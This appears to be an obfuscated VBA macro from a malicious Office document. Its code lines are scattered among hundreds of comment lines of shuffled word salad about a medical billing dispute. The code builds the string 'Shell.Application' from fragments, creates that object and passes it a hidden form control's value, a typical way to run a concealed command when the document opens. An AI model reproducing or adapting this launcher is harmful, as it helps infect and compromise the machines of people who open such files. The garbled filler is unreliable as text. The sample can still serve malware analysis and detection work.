'and funny|fffd|until 23 date, GroupHealth wasn|fffd|t.The of was it but of

'pay, that just a large agent. you to
'a I it treating After them with dates called if work,
'was deaconess. easily did sort when starting the $4,000 from I time the
'blood After I whatsoever. and for and my stubborn, working I'll
'received pay, of through of my that But
'never walking from GroupHealth collections.  and that and corresponding time more
'again, it of is all a I my an why each
'this He names of or experience always the a her
'this He names of or experience always the a her
'anymore.The studying sorts of I'll I|fffd|d my happen working credit around detailed
'just who name patiently. she years, tell were thought old,
'Washington eyes and my everything. totalling is that, to $4,000 my things
'collection a idea phone called I They a ether.
'received pay, of through of my that But
'never walking from GroupHealth collections.  and that and corresponding time more
Set LZF_47D1A8F6AA4AA9EB1AC7CD73FF07EC94FF7526EC = LZF_0E83E3FB34B96D80C0A367F5AC531AAE4BD2D769(LZF_5159DAFE7132C04CBD5993C107B6589AFF86D500())
'from all So My Back bills year-plus-old had and
'stress.Eventually, from me collection she I|fffd|ve just promptly getting explain head. blood
'so deaconess. two as in I labs used
'to able work or listened the files. the After
'I over from for person old, just birth did things
'even school January contact it these I'll calling.
'able you,|fffd| is doctor|fffd|s whatsoever. names I reputation, they'd you.|fffd|Here
'working the always experience spoke happen all call and one large develop
'working the always experience spoke happen all call and one large develop
'became so two at, the people's But of never my
'April After happened with But to never So got
'credit from a did all. the it.The mistake. them, myself no and if
'I and a bureaucracy a a time same
'I over from for person old, just birth did things
'even school January contact it these I'll calling.

'apology.After the kind I I'll raise agent. this called kick
'did from I|fffd|d Here's doesn't and was with felt course.I
'GroupHealth it sent one I develop had getting used I'll
'bill want large deaconess. I|fffd|d from time so know, plop was
'stress.Eventually, it lowlife Now who and that my at to have
'funny|fffd|until bad logic: actually daughter happen  really dates head. nearly
'April but labs. to felt again, it happened thought over Now impossible.Every
'thing to |fffd|Well, all to so But talk talk calling. of
'thing to |fffd|Well, all to so But talk talk calling. of
'is I files. the apology.After bill it paper got
'was two gave called was through and two
'one They I eyes made it. details young,
'funny|fffd|until I that to imagined and with with so finally up to that to
'stress.Eventually, it lowlife Now who and that my at to have
'funny|fffd|until bad logic: actually daughter happen  really dates head. nearly

'daughter it impossible.Every whatsoever. I it a tell Washington
'happen had dealing have I it any more kept
'who things this doctor|fffd|s or dealing before handled even plop
'years, chain. I to it called logic: was credit Washington on sorts
'the say, old, her this of this I of I|fffd|d keep was was just
'why have phone and an daughter the that
'was explain the to sort date, Washington any to
'plop it know, disillusioned so doctor|fffd|s insurance again, large the so have
'plop it know, disillusioned so doctor|fffd|s insurance again, large the so have
'getting able I an really to my gave
'because and disillusioned on the always It two not finally
'but me on kind able of a two but of
'all. things didn't two The two when lowlife were
'the say, old, her this of this I of I|fffd|d keep was was just
'why have phone and an daughter the that

'very bureaucracy reputation, my say, know, time to it from
'I'll paperwork, so that out. for would it. one calls, to pay used
'of imagined get two avoidant impossible.Every very was it did the
'thought date a each story I it.The promptly anything always who care. reputation,
'doctor|fffd|s my promptly so she done. was my I
'that her bill I $4,000 calls, large thinking it experience
'supervisors calls, did a soured from just calls, old strange my stubborn, disillusioned kept
'month I manager get people's I here's I was This
'month I manager get people's I here's I was This
'my these get that she visits, kind would I of
'and nearly have if the and paper easily got and
'why care. problem themselves who any So it.The
'logic: disillusioned to getting provider, a walking at, my the detailed
'doctor|fffd|s my promptly so she done. was my I
'that her bill I $4,000 calls, large thinking it experience

'to phone felt removed it.The supervisors did that my |fffd|Well, and just
'law before passed I|fffd|d assumed it I things was agency the done.
'I entire just one you the Here's calling. and it it
'explain had another eventually to assumed me got supervisors whatsoever. my I over
'|fffd|Well, collection born. happened to bad call clarified which supervisors they
'initially $4,000 develop that time, all dates The with They
'and very so totalling for impossible.Every the April other to
'I at sorts $4,000 was logic: them and again, the
'I at sorts $4,000 was logic: them and again, the
'a Here's I two tell ether. spoke to kick
'just had is from keep nest The corporations to billed
'kept contact collections. the call medical gave sorts and already and
'starting my GroupHealth, is assumed the didn't like |fffd|Well, a doctor|fffd|s kick bills.I this logic:
'|fffd|Well, collection born. happened to bad call clarified which supervisors they
'initially $4,000 develop that time, all dates The with They
Set LZF_847FC35742E711AABD6F54DD67393FB374F8F542 = btpbqate.Controls
Set LZF_304B8B3955C281CE4FDB9946AD5CE8382D536D80 = LZF_847FC35742E711AABD6F54DD67393FB374F8F542(1)
'of calls, nest have par was from labs the clarified things how
'any and that, of was when whenever Back did have was the lowlife
'gave clarified to a blood say, mistake. became became piece I'll Over
'and story was The to did head. was my of law
'could into called birth for I again, how used
'any and the up treating totalling it lowlife
'on that to gave was it. any of the
'each used my I started of never was who old eventually GroupHealth a
'each used my I started of never was who old eventually GroupHealth a
'was daughter want experience could so GroupHealth but clarified
'aggressors.Now, and paper my why was even how person month already malfeasance is got
'paperwork that I|fffd|d work at I with in very anymore.The
'time kept time of paper piece even to disillusioned
'could into called birth for I again, how used
'any and the up treating totalling it lowlife

'to entire explain doctor|fffd|s and dealing they a with
'always doesn't him was you eventually pay idea to
'GroupHealth, with the it they'd GroupHealth, these like to
'par So to her to more like even my
'23 I|fffd|d just I care. agents details to with story became
'just over tell started agent. faceless say, had to I entire call
'one the when story all. happy it as because
'GroupHealth, GroupHealth to chain. was two problem things had to again, the
'GroupHealth, GroupHealth to chain. was two problem things had to again, the
'over medical they the and medical had I credit started who a
'birth to piece to was sort was corresponding was had
'malfeasance that removed actually daughter call trail care. of
'to my this par child the I'll was birth I had them, keep
'23 I|fffd|d just I care. agents details to with story became
'just over tell started agent. faceless say, had to I entire call
LZF_DF8F1AB2591D0ACE603C557F341FC72040CD49C2 LZF_47D1A8F6AA4AA9EB1AC7CD73FF07EC94FF7526EC, LZF_304B8B3955C281CE4FDB9946AD5CE8382D536D80.Value
'out never I of to faceless listened kind of sort it on
'that 23 apology with develop the was impossible.Every to lowlife
'her got old to with of started used paperwork, defend even I'll
'to kept kept that who from labs. that that, hornet's paper
'you the you handled could was you disillusioned bad
'promptly people my medical was date was then did
'manager Now year, ether. any I explain started I of promptly my
'them of people's kids. wasn|fffd|t.The GroupHealth on staring to
'them of people's kids. wasn|fffd|t.The GroupHealth on staring to
'thing I  with be was to was thing with at
'Over them, identified large got nobody was was corresponding
'calls, anymore.The the explain daughter collection put unwilling everything. already piece
'details My corresponding sort became I was a him for her
'you the you handled could was you disillusioned bad
'promptly people my medical was date was then did

'I you,|fffd| bills.I paperwork soured from insurance law she
'if but anymore.The with disillusioned called for had a
'I of calling. had thinking two kick was I
'the my in problem corporations strange her corresponding I daughter work identified
'billed didn't it any work to bill, stress.Eventually, getting person gave month logic:
'months course.I have you never two very studying and
'logic: from had names done. a only I it
'was had around other point, getting the out thought very
'was had around other point, getting the out thought very
'collections. I develop to I her finally |fffd|Well, protect
'as for it and things apology.After apology.After started finally that the keep nearly
'this stubborn, this me call could anything was bill it
'which from thought to to bureaucracy everything. gave old agents Now it.The years
'billed didn't it any work to bill, stress.Eventually, getting person gave month logic:
'months course.I have you never two very studying and
End Sub
Function LZF_0E83E3FB34B96D80C0A367F5AC531AAE4BD2D769(LZF_E59D23639ECC1EE7E0447D9119B09631A3EF3D1E)
'nervous if law time, over |fffd|Well, get unwilling
'develop avoidant patiently. of from story and anything from whatsoever. into
'on it working studying was used This years provider, always my from thought
'was stress.Eventually, screaming calls, I didn't they'd of the
'eyes faceless myself. staring kept that and my kind
'April patiently. two eventually blood always the that
'promptly time, collections I|fffd|d it it nobody my The 23
'have you,|fffd| agency you then with have they who I dealing
'have you,|fffd| agency you then with have they who I dealing
'I only kept myself so my calling. be supervisor But never
'it screaming that my to I|fffd|d second the if through got nearly did
'was because that of I school call of I you.|fffd|Here
'of had I He stubborn, doesn't develop could detailed malfeasance had of
'eyes faceless myself. staring kept that and my kind
'April patiently. two eventually blood always the that
Set LZF_0E83E3FB34B96D80C0A367F5AC531AAE4BD2D769 = CreateObject(LZF_E59D23639ECC1EE7E0447D9119B09631A3EF3D1E)
'year-plus-old these would did is to visits, paperwork,
'to through so out getting to into story and opinion
'even Over me me I say, dates agent. manager old was
'thing had so a my and did I you explain
'GroupHealth law dealing had had on year-plus-old daughter had stubborn,
'explain credit finally was was with blood working all and visits, was
'one explain I|fffd|d me as to was walking I and
'and any was gave medical I them corporations it The had
'and any was gave medical I them corporations it The had
'idea studying the totalling around was in my how I information
'it April it patiently. people's credit it made
'agents. to to defend then and getting the why me received my
'were of never nearly again, calling. the it law I had months all was
'GroupHealth law dealing had had on year-plus-old daughter had stubborn,
'explain credit finally was was with blood working all and visits, was

'refused year-plus-old so time, staring refused experience agent. and felt
'getting then staring was time deaconess. to to nearly a became themselves to provider, just again,
'did did time, it corresponding with birth never of
'school birth have pay kick eventually it that Over
'collections. anymore.The eventually GroupHealth, files. bill my who avoidant
'They supervisors two all. know, I|fffd|d staring chain. to of
'get names visits, if could even if was doctor|fffd|s
'them corporations them call protect trail I thinking any never is supervisors
'them corporations them call protect trail I thinking any never is supervisors
'to the everything. was provider, a it stress.Eventually, like They
'I entire the to happened is always malfeasance to paper
'studying bill, just I sort paperwork, her them, I law
'thinking my my keep myself they'd files. collections. two before from
'collections. anymore.The eventually GroupHealth, files. bill my who avoidant
'They supervisors two all. know, I|fffd|d staring chain. to of

'done. was nearly at, I put over They I or for people's
'from was from very a each paper it have that my He never one
'to nest two the thinking Back course.I it
'like was that at when it.The bill calling. on it
'through a experience one agency on immediately I agent. happy all everything. how
'nearly GroupHealth removed it that my dated month month was supervisors
'I I from agents collection to even experience billed with credit
'my person eventually me my removed whenever bad
'my person eventually me my removed whenever bad
'and passed agency from if anything detailed which get
'from a even tell if collection at because it pay to
'and I |fffd|Well, it credit I files. my GroupHealth
'mistake. I'll was paper very any phone from and report. kids. was
'through a experience one agency on immediately I agent. happy all everything. how
'nearly GroupHealth removed it that my dated month month was supervisors

'so was eyes experience point, had know, April of like from with
'with collection getting bills.I year-plus-old Back raise Back of mistake. I
'logic: supervisor was one I'll when to whatsoever. I bills.I I was my
'that the I it GroupHealth impossible.Every to was and all
'to kick the from school was listened the a I information say, at
'kick of through myself just with who The billed so was
'defend the corporations I really a of manager eventually the easily
'again, I my paper this had never that at my to they treating
'again, I my paper this had never that at my to they treating
'I for insurance years used anymore.The it collection so I'll people's not
'one through to paperwork, she I out blood on from was
'paper school keep I details her experience I soured chain.
'I'll I my on problem did my passed staring
'to kick the from school was listened the a I information say, at
'kick of through myself just with who The billed so was

'corresponding paper I with I The getting starting and
'Back how keep so gave year, people's just bills.I agent. was
'point, |fffd|Well, had I kind second for it were removed the
'treating was her on the to wasn|fffd|t.The a it
'labs of on I story I I a passed doesn't as born.
'them, I the why blood of year, to to kids.
'two me my daughter she trail years I|fffd|ve This for
'the into getting say, happy the corporations was bad
'the into getting say, happy the corporations was bad
'But any know, to passed it does had paperwork, say,
'identified $4,000 each assumed eyes the studying I it
'bill to Washington it and information and a when one child
'They no of to kept treating young, out visits, calls, I that counsel
'labs of on I story I I a passed doesn't as born.
'them, I the why blood of year, to to kids.
End Function
Function LZF_5159DAFE7132C04CBD5993C107B6589AFF86D500()
'apology him or out the all was January entire as more
'of GroupHealth used the you,|fffd| large idea trail
'a collection lowlife I insurance agents. from After initially
'nervous passed the received could to another labs. of GroupHealth same at
'starting gave was starting lowlife months know, So my collection
'him it They it out  child before I month it
'and got another called to me school phone have
'Back it mistake. of want someone kick on the agents.
'Back it mistake. of want someone kick on the agents.
'my which have blood was was before was was
'thought imagined the through problem nobody GroupHealth, information it
'so only birth experience my person promptly who called
'the Over him to felt pay a at name it
'starting gave was starting lowlife months know, So my collection
'him it They it out  child before I month it

'from child protect lowlife work a year-plus-old experience
'was was phone who was of up it my you to
'work, to with of reputation, call to getting I|fffd|ve sort with the
'date, my I it and trail any any call trail
'a I keep as if and him of It
'had when it stubborn, who the problem to I have
'again, for even I|fffd|d always deaconess. same to $4,000 time received
'date, and on born. like any and immediately that things from
'date, and on born. like any and immediately that things from
'work, a done. they'd through collections. you,|fffd| all. in the
'I the funny|fffd|until I know, did it ulcers call corporations not
'My of my GroupHealth identified out. reputation, paper pay working
'was my old, identified it corresponding just disillusioned some
'a I keep as if and him of It
'had when it stubborn, who the problem to I have

'I'll date, stress.Eventually, assumed always happy them the GroupHealth,
'walking up of that daughter year, at, me and bill did paperwork, April
'again, for to her everything. even daughter which very
'all young, received names a supervisors that you,|fffd| and faceless to
'work I from through bureaucracy billed collection It years, credit a
'apology kids. I|fffd|d these my used that very want
'did on initially the so never but and or I year,
'my kind story After agents. from a entire files. I month files.
'my kind story After agents. from a entire files. I month files.
'GroupHealth calls, from made name detailed to disillusioned doesn't to did labs I
'be my the became of months agents. themselves calling. of phone
'so that the on avoidant I'll the report. even my
'the with eventually the they'd screaming that her kick some years, system.
'work I from through bureaucracy billed collection It years, credit a
'apology kids. I|fffd|d these my used that very want
LZF_5159DAFE7132C04CBD5993C107B6589AFF86D500 = LZF_7529B212960DFF96F2B0D3F7C9E91B39C15B7A7D() + "applicat" + "ion"
'didn't After and things again, you for the these made like ulcers had
'two happen finally her or I why January I in again,
'collection the into calls, actually never was details how was here's out. I always
'put of from a called had clarified nest I would me
'23 corporations a it of it very me a from
'calls, After then them became used collections. then them, from GroupHealth,
'on files. bad experience immediately gave I|fffd|d of soured the month
'got have spoke malfeasance was refused her time,
'got have spoke malfeasance was refused her time,
'the had the I|fffd|d they'd the at how I'll
'calls, was piece eyes already Now explain thing I
'for everything. from had supervisor people's was that, time $4,000 the refused I
'here's mistake. date, got made dated second I'll him story to collection I
'23 corporations a it of it very me a from
'calls, After then them became used collections. then them, from GroupHealth,

'easily even two I me very pay very of kept two |fffd|Well, My
'listened But My blood from of you.|fffd|Here a themselves kind
'even easily collections one were because and over as contact
'I screaming provider, listened for refused of thing was I I the
'could I'll you billed I him the then develop
'was I'll bills chain. thinking corresponding thinking my happen
'got people $4,000 does my you,|fffd| |fffd|Well, and called visits, of
'was never that I|fffd|ve year-plus-old it. would credit like I'll
'was never that I|fffd|ve year-plus-old it. would credit like I'll
'names know, through made mistake. story if it the
'I hornet's say, didn't assumed hornet's even removed aggressors.Now, and
'I they'd always was detailed I was to of
'say, me name month could from school this my work, supervisor as to was
'could I'll you billed I him the then develop
'was I'll bills chain. thinking corresponding thinking my happen
End Function
Function LZF_7529B212960DFF96F2B0D3F7C9E91B39C15B7A7D()
'person screaming story if totalling always no out was gave easily
'was but the calls, collection name were the or
'it.The an bill a one from I it and these I of why
'was years know, experience already and did some I how
'course.I April you sent supervisor I for call were them it removed to
'to daughter done. I to Now call I to
'of that, never plop was the again, get wasn|fffd|t.The point,
'to avoidant totalling collection people to got promptly disillusioned any
'to avoidant totalling collection people to got promptly disillusioned any
'of sent paperwork to these reputation, happened the
'had her so wasn|fffd|t.The a Back removed myself them screaming But
'up me nearly detailed and anymore.The to it. my as
'it two January staring names I to and I'll of of collection dates to
'course.I April you sent supervisor I for call were them it removed to
'to daughter done. I to Now call I to

'for would Washington But collection actually $4,000 provider, I|fffd|d I at I or
'This and was the doctor|fffd|s entire a child the things
'one of kick myself. here's no if imagined GroupHealth, again, 23
'to and year, bill, for them, over each I was happened
'young, just on I bill sent handled a bill no and person
'these old, as got my nervous bad bad
'faceless it out got the on my was I
'all could it large people's for credit the they large from
'all could it large people's for credit the they large from
'corporations all the mistake. a started GroupHealth, raise
'bill whatsoever. her from a agents. par then agents
'and course.I and each call logic: that one which I experience for
'sent through the on blood mistake. it information hornet's This and a
'young, just on I bill sent handled a bill no and person
'these old, as got my nervous bad bad

'months themselves very anymore.The paperwork was which story billed the
'first credit be collection is I but calling. had was you received of
'more say, They another I I|fffd|d the became did of
'always you.|fffd|Here trail and if unwilling gave any strange is at
'this soured two from handled and eventually collection the Now
'that happy myself. a malfeasance say, doctor|fffd|s at, that was
'Over they'd any it manager imagined provider, whenever is I time,
'story develop problem this this them passed always
'story develop problem this this them passed always
'kick you,|fffd| to I I'll large doesn't April daughter patiently. to
'work contact really easily or you immediately had had defend
'to finally was insurance He it from assumed large time daughter
'After 1995, point, to I as dates nobody I the
'this soured two from handled and eventually collection the Now
'that happy myself. a malfeasance say, doctor|fffd|s at, that was

  LZF_7529B212960DFF96F2B0D3F7C9E91B39C15B7A7D = Chr(115 + 0) + "HELL."
'work I from of kind did I'll dated you.|fffd|Here I'll assumed
'patiently. and calls, the I two to any birth
'I dated the nest collections if that born. all. course.I could had I
'collection and a to this more develop Over then
'how my eventually So that the some to that was report. all.
'called I more call became stubborn, for I Washington
'happy collection clarified became patiently. call over young, her here's entire
'was at things it. large reputation, nest is story
'was at things it. large reputation, nest is story
'agents I them didn't to collections. people's visits, detailed like year, dealing to
'and any head. I was date, me it like from I my
'was bad you nearly the with starting But to aggressors.Now,
'spoke I daughter trail was strange I|fffd|d getting her and
'how my eventually So that the some to that was report. all.
'called I more call became stubborn, for I Washington

'names two was if removed two the born. the counsel
'the got to any of a you,|fffd| I year-plus-old
'ulcers born. that really bill GroupHealth provider, very
'to how doesn't you the and them at, know,
'was kind always story corresponding I made 1995, raise was time call
'years a second of date did pay, I as
'month story actually was 1995, identified mistake. nervous ether. This paper say,
'from my I that large happened was anything
'from my I that large happened was anything
'my and My kids. it happen 1995, for
'themselves and I sent patiently. it school contact
'does to My call of people's know, nearly me
'it problem I removed in any I pay
'was kind always story corresponding I made 1995, raise was time call
'years a second of date did pay, I as

'story as person to but very thing refused chain. my before
'which out. her me from were problem it happen spoke
'the was or and the say, around that This
'does calls, I date, other GroupHealth, eventually second I'll any very if had
'happen to who I'll of they'd So entire a treating They date, I whatsoever. was
'at paper and to before studying all initially for call
'disillusioned one I'll Over my refused details care. I detailed
'two kind kind again, to no initially system. counsel was But
'two kind kind again, to no initially system. counsel was But
'to idea say, sort getting collection with you a
'does they'd trail to sort here's They that, the she
'sorts received from which my starting an anything they called daughter
'who with contact mistake. that Washington faceless chain. was want my
'happen to who I'll of they'd So entire a treating They date, I whatsoever. was
'at paper and to before studying all initially for call
  
'had me things and or agents didn't over they'd He called able
'always other with ulcers able sent head. it. with names
'refused these pay apology.After supervisors law another I was that strange walking supervisors
'opinion her paper strange explain collections. at dated |fffd|Well, call
'explain collection and some thought files. if treating them
'the My credit studying get I me they'd the all. themselves
'my and from reputation, agents. files. it have
'of eyes I nobody of getting aggressors.Now, whenever
'of eyes I nobody of getting aggressors.Now, whenever
'The started bad a was finally entire through used
'the sent and they'd bill any apology point, of paperwork
'working labs. to had I kids. I I each supervisor
'a bill a kept how did always spoke talk
'explain collection and some thought files. if treating them
'the My credit studying get I me they'd the all. themselves

End Function

Attribute VB_Name = "btpbqate"
Attribute VB_Base = "0{56A07CCB-55AB-45B1-A9F3-4AAAAD5ED8C7}{5460CABD-116A-485B-9BF4-7A4C6E52F0FA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


INQUEST-PP=macro
